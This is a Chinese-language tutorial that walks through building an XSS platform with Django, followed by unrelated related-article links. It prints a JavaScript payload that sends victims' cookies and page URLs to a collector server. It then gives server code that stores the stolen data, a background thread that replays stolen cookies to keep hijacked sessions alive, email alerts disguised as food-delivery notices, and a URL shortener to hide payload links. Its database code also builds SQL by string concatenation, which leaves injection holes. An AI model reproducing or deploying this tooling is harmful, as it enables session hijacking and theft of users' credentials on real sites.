使用Django簡(jiǎn)單編寫一個(gè)XSS平臺(tái)的方法步驟
1) 簡(jiǎn)要描述
原理十分簡(jiǎn)單2333,代碼呆萌,大牛勿噴 >_<
2) 基礎(chǔ)知識(shí)
- XSS攻擊基本原理和利用方法
- Django框架的使用
3) Let's start
0x01
工欲善其事必先利其器,首先我們需要準(zhǔn)備編寫代碼的各種工具和環(huán)境,這里不細(xì)說。我這里的環(huán)境和工具如下:
- python 3.7.0
- pycharm
- windows 10
- mysql 8.0.15
- Django 2.1.3
需要用到的第三方庫:
- django
- pymysql
- requests
0x02
我們先看一下XSS腳本是如何工作的
var website = "http://127.0.0.1"; (function() { (new Image()).src = website + '/?keepsession=1&location=' + escape((function() { try { return document.location.href } catch(e) { return '' } })()) + '&toplocation=' + escape((function() { try { return top.location.href } catch(e) { return '' } })()) + '&cookie=' + escape((function() { try { return document.cookie } catch(e) { return '' } })()) + '&opener=' + escape((function() { try { return (window.opener && window.opener.location.href) ? window.opener.location.href: '' } catch(e) { return '' } })()); })();
這段代碼非常簡(jiǎn)單,就是通過javascript獲取有用信息,然后通過訪問xss平臺(tái)將信息作為GET參數(shù)傳給服務(wù)器。
注意:這里使用AJAX可能會(huì)出現(xiàn)CORS跨域問題。
0x03
先給出關(guān)鍵代碼,其他都是Django相關(guān)的內(nèi)容,這里不做相關(guān)討論。
""" 根據(jù)url值動(dòng)態(tài)返回相應(yīng)的javascript代碼 """ import pymysql,os from user.safeio import re_check def get_info(url): if not re_check(url,'num_letter'): return 'default' db = pymysql.connect('localhost','root','root','xss') cursor = db.cursor() cursor.execute("Select name From projects Where url='"+url+"'") js_name = cursor.fetchone()[0] if js_name == None: return 'default' else: return (js_name) def get_js_value(url): js_name = get_info(url) file = '\\script\\'+js_name + '.js' js_value = open(os.getcwd()+file).read() js_value = js_value.replace('<-1234->',url) return js_value
import pymysql,time from .getscript import get_info def connect(): try: db = pymysql.connect('localhost', 'root', 'root', 'xss') cursor = db.cursor() return db,cursor except: print('連接數(shù)據(jù)庫失敗,正在嘗試重新連接') connect() def put_letter(requests,url): now_time = time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time()))[2:] if 'HTTP_X_FORWARDED_FOR' in requests.META: ip = requests.META['HTTP_X_FORWARDED_FOR'] else: try: ip = requests.META['REMOTE_ADDR'] except: ip = '0.0.0.0' ip = ip.replace("'","\'") origin = requests.GET.get('location','Unknown').replace("'","\'") software = requests.META.get('HTTP_USER_AGENT','Unknown').replace("'","\'") method = requests.method.replace("'","\'") data = requests.GET.get('cookie','No data').replace("'","\'") keep_alive = requests.GET.get('keepsession','0').replace("'","\'") list = [now_time,ip,origin,software,method,data,keep_alive] put_mysql(list,url) def put_mysql(list,url): db,cursor = connect() name = get_info(url) cursor.execute("Select user From projects Where url='"+url+"'") user = cursor.fetchone()[0] m_query = "INSERT INTO letters(time,name,ip,origin,software,method,data,user,keep_alive) VALUES('{0}','{1}','{2}','{3}','{4}','{5}','{6}','{7}','{8}')" m_query = m_query.format(list[0],name,list[1],list[2],list[3],list[4],list[5],user,list[6]) cursor.execute(m_query) db.commit() db.close() def get_letters(username): db, cursor = connect() m_query = "SELECT * FROM letters WHERE user = '{}'" m_query = m_query.format(username) cursor.execute(m_query) result_list = cursor.fetchall() return result_list
既然我們知道了xss腳本會(huì)將信息構(gòu)造通過GET的參數(shù)形式傳給XSS平臺(tái),我們只需在服務(wù)器接受數(shù)據(jù)并保存即可。
0x04
我們可以為我們的平臺(tái)編寫新的功能以完善我們的平臺(tái),如郵件提醒,cookie活性保持等
#coding=utf-8 ''' 郵件發(fā)送 ''' import smtplib from email.mime.text import MIMEText from email.utils import formataddr my_sender='xxxx' my_pass = 'xxxx' def send_mail(user_mail): try: print(user_mail) msg=MIMEText('您點(diǎn)的外賣已送達(dá),請(qǐng)登錄平臺(tái)查詢','plain','utf-8') msg['From']=formataddr(["XSS平臺(tái)",my_sender]) msg['To']=formataddr(["顧客",user_mail]) msg['Subject']="您點(diǎn)的外賣已送達(dá),請(qǐng)登錄平臺(tái)查詢" server=smtplib.SMTP_SSL("smtp.qq.com", 465) server.login(my_sender, my_pass) server.sendmail(my_sender,[user_mail,],msg.as_string()) server.quit() except Exception: pass
''' 使用獨(dú)立于主線程的其他線程 來保持通用項(xiàng)目的cookie信息'活性' 默認(rèn)保持一個(gè)小時(shí)的活性 ''' import requests,queue,time,pymysql Cookie_Time = 1 def decrease(time,number): if time < number: time = '0'+str(time) else: time = str(time) return time def count_time(now_time): global Cookie_Time year = int(now_time[0:2]) month = int(now_time[3:5]) day = int(now_time[6:8]) hours = int(now_time[9:11]) if hours < Cookie_Time: if day == 1: if month == 1: month=12 year -= 1 else: day=30 month -= 1 else: day -= 1 hours += 19 else: hours -= 5 hours = decrease(hours,10) day = decrease(day,10) month = decrease(month,10) year = decrease(year,10) dec_time = ("{0}-{1}-{2} {3}").format(year,month,day,hours) + now_time[11:] return dec_time def create_queue(): Cookie_queue = queue.Queue() now_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))[2:] dec_time = count_time(now_time) m_query = ("SELECT software,origin,data FROM letters WHERE name='default' and time>'{}' and keep_alive = '1'").format(dec_time) db = pymysql.connect('127.0.0.1','root','root','xss') cursor = db.cursor() cursor.execute(m_query) return_list = cursor.fetchall() for x in return_list: Cookie_queue.put(x) return Cookie_queue def action(): while True: time.sleep(60) task_queue = create_queue() while not task_queue.empty(): tasks = task_queue.get() url = tasks[1] ua = tasks[0] cookie = tasks[2] headers = {'User-Agent': ua, 'Cookie': cookie} try: requests.get(url, headers=headers) except: pass
注意這里需要使用獨(dú)立于django主線程的子線程,比如我在manager.py里添加了這么一段代碼:
import threading from xssplatform.keep_alive import action class keep_Thread(threading.Thread): def __init__(self): super(keep_Thread,self).__init__() def run(self): action() if __name__ == '__main__': th = keep_Thread() th.start()
短鏈接:
''' 短鏈接生成 接口c7.gg ''' import requests,json Headers = { "accept" : "application/json, text/javascript, */*; q=0.01", "accept-encoding" : "gzip, deflate, br", "accept-language" : "zh-CN,zh;q=0.9,en;q=0.8", "content-length" : "53", "content-type" : "application/x-www-form-urlencoded; charset=UTF-8", "origin" : "https://www.985.so", "referer" : "https://www.985.so/", "user-agent" : "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36", } def url_to_short(url): global Headers data = {'type':'c7','url':url} r = requests.post('https://create.ft12.com/done.php?m=index&a=urlCreate',data=data,headers=Headers) list = json.loads(r.text) return list['list']
4) 最后
其實(shí)看起來高大上的XSS平臺(tái)原理就那么簡(jiǎn)單,真正難的部分是關(guān)于XSS跨站腳本的編寫。
此項(xiàng)目已開源于 Github ,有任何問題可以提交issue,我會(huì)在第一時(shí)間進(jìn)行回復(fù)。
以上就是本文的全部?jī)?nèi)容,希望對(duì)大家的學(xué)習(xí)有所幫助,也希望大家多多支持腳本之家。
- Django框架HttpRequest對(duì)象用法實(shí)例分析
- Django框架HttpResponse對(duì)象用法實(shí)例分析
- Django接收自定義http header過程詳解
- Django使用HttpResponse返回圖片并顯示的方法
- Django的HttpRequest和HttpResponse對(duì)象詳解
- 在Heroku云平臺(tái)上部署Python的Django框架的教程
- Django+RestFramework API接口及接口文檔并返回json數(shù)據(jù)操作
- Django調(diào)用百度AI接口實(shí)現(xiàn)人臉注冊(cè)登錄代碼實(shí)例
- 通過Django Admin+HttpRunner1.5.6實(shí)現(xiàn)簡(jiǎn)易接口測(cè)試平臺(tái)
相關(guān)文章
一小時(shí)學(xué)會(huì)TensorFlow2之大幅提高模型準(zhǔn)確率
這篇文章主要介紹了TensorFlow2之大幅提高模型準(zhǔn)確率,本文給大家介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或工作具有一定的參考借鑒價(jià)值,需要的朋友可以參考下2021-09-09Python基礎(chǔ)實(shí)戰(zhàn)總結(jié)
今天要給大家介紹的是Python基礎(chǔ)實(shí)戰(zhàn),本文主要以舉例說明講解:?jiǎn)栴}的關(guān)鍵點(diǎn)就是在于構(gòu)造姓名,學(xué)號(hào)和成績(jī),之后以字典的形式進(jìn)行寫入文件。這里準(zhǔn)備兩個(gè)列表,一個(gè)姓,一個(gè)名,之后使用random庫進(jìn)行隨機(jī)字符串拼接,得到姓名,需要的朋友可以參考一下2021-10-10python實(shí)現(xiàn)字符串和數(shù)字拼接
今天小編就為大家分享一篇python實(shí)現(xiàn)字符串和數(shù)字拼接,具有很好的參考價(jià)值,希望對(duì)大家有所幫助。一起跟隨小編過來看看吧2020-03-03python下os模塊強(qiáng)大的重命名方法renames詳解
這篇文章主要介紹了python下os模塊強(qiáng)大的重命名方法renames詳解的相關(guān)資料,需要的朋友可以參考下2017-03-03Python根據(jù)成績(jī)分析系統(tǒng)淺析
在本篇文章里小編給大家分享了關(guān)于Python根據(jù)成績(jī)分析是否繼續(xù)深造一個(gè)系統(tǒng)的相關(guān)知識(shí)點(diǎn),有需要的朋友們學(xué)習(xí)下。2019-02-02淺談Keras中fit()和fit_generator()的區(qū)別及其參數(shù)的坑
這篇文章主要介紹了Keras中fit()和fit_generator()的區(qū)別及其參數(shù)的坑,具有很好的參考價(jià)值,希望對(duì)大家有所幫助。如有錯(cuò)誤或未考慮完全的地方,望不吝賜教2021-05-05Python3中的re.findall()方法及re.compile()
這篇文章主要介紹了Python3中的re.findall()方法及re.compile(),具有很好的參考價(jià)值,希望對(duì)大家有所幫助。如有錯(cuò)誤或未考慮完全的地方,望不吝賜教2022-05-05